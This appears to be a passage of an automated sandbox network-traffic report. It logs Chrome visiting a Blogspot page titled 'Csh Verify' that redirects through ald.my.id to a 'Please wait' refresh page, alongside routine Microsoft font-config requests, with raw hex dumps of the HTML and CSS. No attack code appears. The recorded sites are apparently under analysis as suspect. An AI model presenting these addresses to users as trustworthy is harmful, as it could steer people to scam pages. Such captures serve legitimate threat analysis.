                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 6f 67 2e 69 65 43 73 73 52 65 74 72 6f 66 69 74 4c 69 6e 6b 73 5d 2d 2d 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 37 72 65 63 6f 76 65 72 79 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 27 20 70 72 6f 70 65 72 74 79 3d 27 6f 67 3a 75 72 6c 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 43 73 68 20 56 65 72 69 66 79 27 20 70 72 6f 70 65 72 74 79 3d 27 6f 67 3a 74 69 74 6c 65 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 27 20 70 72 6f 70 65 72 74 79 3d 27 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 27 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 70 61 67 65 2d 73 6b 69 6e 2d 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 21 2d 2d 0a 2e 63 6c 65 61 72 20 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: og.ieCssRetrofitLinks]--><meta content='https://my7recovery.blogspot.com/' property='og:url'/><meta content='Csh Verify' property='og:title'/><meta content='' property='og:description'/><style id='page-skin-1' type='text/css'>....clear {clear:both;}
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 6e 74 2c 20 23 48 54 4d 4c 34 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0a 7d 0a 2e 70 6f 73 74 2d 62 6f 64 79 20 7b 0a 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 32 70 78 3b 0a 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 0a 7d 0a 2e 70 6f 73 74 2d 62 6f 64 79 2e 73 69 6e 67 6c 65 20 7b 0a 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 7d 0a 2e 70 6f 73 74 2d 62 6f 64 79 20 69 6d 67 20 7b 0a 6d 61 78 2d 77 69 64 74 68 3a 31 30 25 3b 0a 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0a 7d 0a 2e 70 6f 73 74 2d 62 6f 64 79 20 2e 70 6f 73 74 2d 74 69 74 6c 65 20 7b 0a 66 6f 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: nt, #HTML4 .widget-content {background:transparent;padding:0px;border:0px;}.post-body {margin-right:12px;display:flex;}.post-body.single {display:block;}.post-body img {max-width:10%;display:block;margin:auto;}.post-body .post-title {fon
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 30 70 78 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 20 74 72 61 6e 73 69 74 69 6f 6e 3a 30 2e 33 73 7d 0a 23 62 6c 6f 67 2d 70 61 67 65 72 2d 6f 6c 64 65 72 2d 6c 69 6e 6b 20 61 3a 68 6f 76 65 72 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 31 39 36 66 33 7d 0a 23 48 65 61 64 65 72 31 20 7b 0a 63 6f 6c 6f 72 3a 23 66 66 66 3b 0a 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 32 36 37 62 32 3b 0a 70 61 64 64 69 6e 67 3a 20 33 70 78 20 31 35 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 0a 7d 0a 2e 68 65 61 64 65 72 2d 77 69 64 67 65 74 20 61 20 7b 0a 63 6f 6c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0px; display:inline-block; position:relative; transition:0.3s}#blog-pager-older-link a:hover {background:#2196f3}#Header1 {color:#fff;display: block;background-color: #4267b2;padding: 3px 15px;margin: auto;line-height:1em;}.header-widget a {col
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 70 78 3b 0a 6c 65 66 74 3a 20 30 70 78 3b 0a 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 0a 7d 0a 23 48 54 4d 4c 32 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 2c 20 23 42 6c 6f 67 53 65 61 72 63 68 31 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0a 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 70 78 3b 0a 7d 0a 6d 61 69 6e 20 7b 0a 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 70 61 64 64 69 6e 67 3a 30 70 78 20 31 30 70 78 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 6c 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: px;left: 0px;display:block;position:relative;}#HTML2 .widget-content, #BlogSearch1 .widget-content {background:transparent;padding:0px;border:0px;border-radius:0px;}main {max-width: 640px;margin: auto;padding:0px 10px;position: relative;le
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 70 6e 67 6f 64 69 6e 67 4d 69 64 64 6c 65 41 64 73 20 7b 0a 62 6f 72 64 65 72 3a 20 30 70 78 3b 0a 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 70 78 3b 0a 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 70 78 3b 0a 7d 0a 23 50 61 67 65 4c 69 73 74 31 20 68 33 20 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 23 50 61 67 65 4c 69 73 74 31 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 35 38 39 39 3b 20 63 6f 6c 6f 72 3a 23 66 66 66 3b 7d 0a 23 50 61 67 65 4c 69 73 74 31 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 20 61 20 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 7d 0a 23 50 61 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: pngodingMiddleAds {border: 0px;margin: 10px 0px;padding: 0px;background: transparent;border-radius: 0px;}#PageList1 h3 {display:none}#PageList1 .widget-content {background-color:#365899; color:#fff;}#PageList1 .widget-content a {color:#fff;}#Pag
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 61 73 74 2d 63 68 69 6c 64 7b 0a 62 6f 72 64 65 72 3a 30 70 78 3b 0a 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 7d 0a 23 73 69 61 70 6e 67 6f 64 69 6e 67 52 65 6c 61 74 65 64 4c 69 73 74 20 75 6c 20 6c 69 20 2e 74 68 75 6d 62 7b 0a 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 70 78 3b 0a 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 37 70 78 3b 0a 66 6c 6f 61 74 3a 6c 65 66 74 3b 0a 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 35 70 78 3b 0a 7d 0a 23 73 69 61 70 6e 67 6f 64 69 6e 67 52 65 6c 61 74 65 64 4c 69 73 74 20 75 6c 20 6c 69 20 61 7b 0a 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0a 7d 0a 23 73 69 61 70 6e 67 6f 64 69 6e 67 52 65 6c 61 74 65 64 4c 69 73 74 20 75 6c 20 6c 69 20 61 2e 6a 75 64 75 6c 7b 0a 63 6f 6c 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ast-child{border:0px;padding:0px;}#siapngodingRelatedList ul li .thumb{overflow:hidden;line-height:0px;border-radius:7px;float:left;margin-right:15px;}#siapngodingRelatedList ul li a{display:block;}#siapngodingRelatedList ul li a.judul{colo
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1207INData Raw: 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 7d 0a 2e 78 44 69 61 6c 6f 67 20 7b 20 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 6c 65 66 74 3a 30 70 78 3b 7d 0a 7d 0a 0a 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 74 65 6d 70 6c 61 74 65 2d 73 6b 69 6e 2d 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 21 2d 2d 0a 62 6f 64 79 23 6c 61 79 6f 75 74 20 23 48 54 4d 4c 31 20 7b 0a 76 69 73 69 62 69 6c 69 74 79 3a 20 76 69 73 69 62 6c 65 3b 0a 6f 70 61 63 69 74 79 3a 20 31 3b 0a 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 6f 76 65 72 66 6c 6f 77 3a 20 75 6e 73 65 74 3b 0a 7d 0a 62 6f 64 79 23 6c 61 79 6f 75 74 20 23 48 54 4d 4c 31 20 2e 77 69 64 67 65 74 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0px; height: 120px; }.xDialog { width:300px; height: 120px; left:0px;}}--></style><style id='template-skin-1' type='text/css'>...body#layout #HTML1 {visibility: visible;opacity: 1;height: auto;overflow: unset;}body#layout #HTML1 .widget-conte
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:27 UTC1390INData Raw: 38 30 30 30 0d 0a 55 46 34 45 4d 4b 4a 55 70 4a 55 73 56 44 53 55 6f 58 43 75 68 6f 61 6b 46 41 46 68 33 5a 56 6b 6f 50 30 77 4e 53 49 34 58 6b 47 65 4a 6f 52 51 41 6d 51 43 63 41 51 45 52 46 51 6d 46 45 5a 2b 30 53 6b 78 75 61 6b 6c 50 4a 33 46 7a 42 67 42 65 57 49 63 46 65 6e 78 2b 58 67 6b 55 6b 4d 6a 5a 45 57 63 58 49 77 63 51 62 69 49 43 41 6b 34 57 55 48 35 55 6b 32 56 6c 45 52 64 62 58 53 63 52 58 41 2f 30 39 66 63 55 33 58 68 44 70 4b 44 41 67 66 41 4d 4b 6b 53 59 53 79 45 52 68 67 51 64 36 67 67 42 41 44 73 3d 22 29 20 31 30 30 25 20 31 30 30 25 20 6e 6f 2d 72 65 70 65 61 74 3b 27 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 3d 27 61 73 79 6e 63 27 20 73 72 63 3d 27 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 8000UF4EMKJUpJUsVDSUoXCuhoakFAFh3ZVkoP0wNSI4XkGeJoRQAmQCcAQERFQmFEZ+0SkxuaklPJ3FzBgBeWIcFenx+XgkUkMjZEWcXIwcQbiICAk4WUH5Uk2VlERdbXScRXA/09fcU3XhDpKDAgfAMKkSYSyERhgQd6ggBADs=") 100% 100% no-repeat;'><script async='async' src='//pagead2.googlesyndication


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          3192.168.2.749715198.252.106.1474432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC741OUTGET /?arsae=https%3A%2F%2Fmy7recovery.blogspot.com%2F&arsae_ref= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://my7recovery.blogspot.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC582INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          location: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          content-length: 0
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:28 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          4192.168.2.749716198.252.106.1474432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC734OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://my7recovery.blogspot.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC469INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          content-length: 219
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:28 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC219INData Raw: 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 55 52 4c 3d 2f 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 22 3e 0a 09 09 3c 70 3e 50 6c 65 61 73 65 20 77 61 69 74 2e 09 3c 2f 70 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><meta http-equiv="refresh" content="1;URL=/"><meta name="viewport" content="width=device-width, initial-scale=1"></head><body style="text-align:center; "><p>Please wait.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          5192.168.2.749717184.28.90.27443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:28 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF70)
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=113587
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:28 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 2


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          6192.168.2.749718198.252.106.1474432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:29 UTC626OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:29 UTC415INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          content-type: text/html
                                                                                                                                                                                                                                                                                                                                                                          content-length: 796
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:29 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:29 UTC796INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          7192.168.2.749719184.28.90.27443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:29 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:29 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=113527
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:29 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 2
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:29 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          8192.168.2.749720198.252.106.1474432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:30 UTC766OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
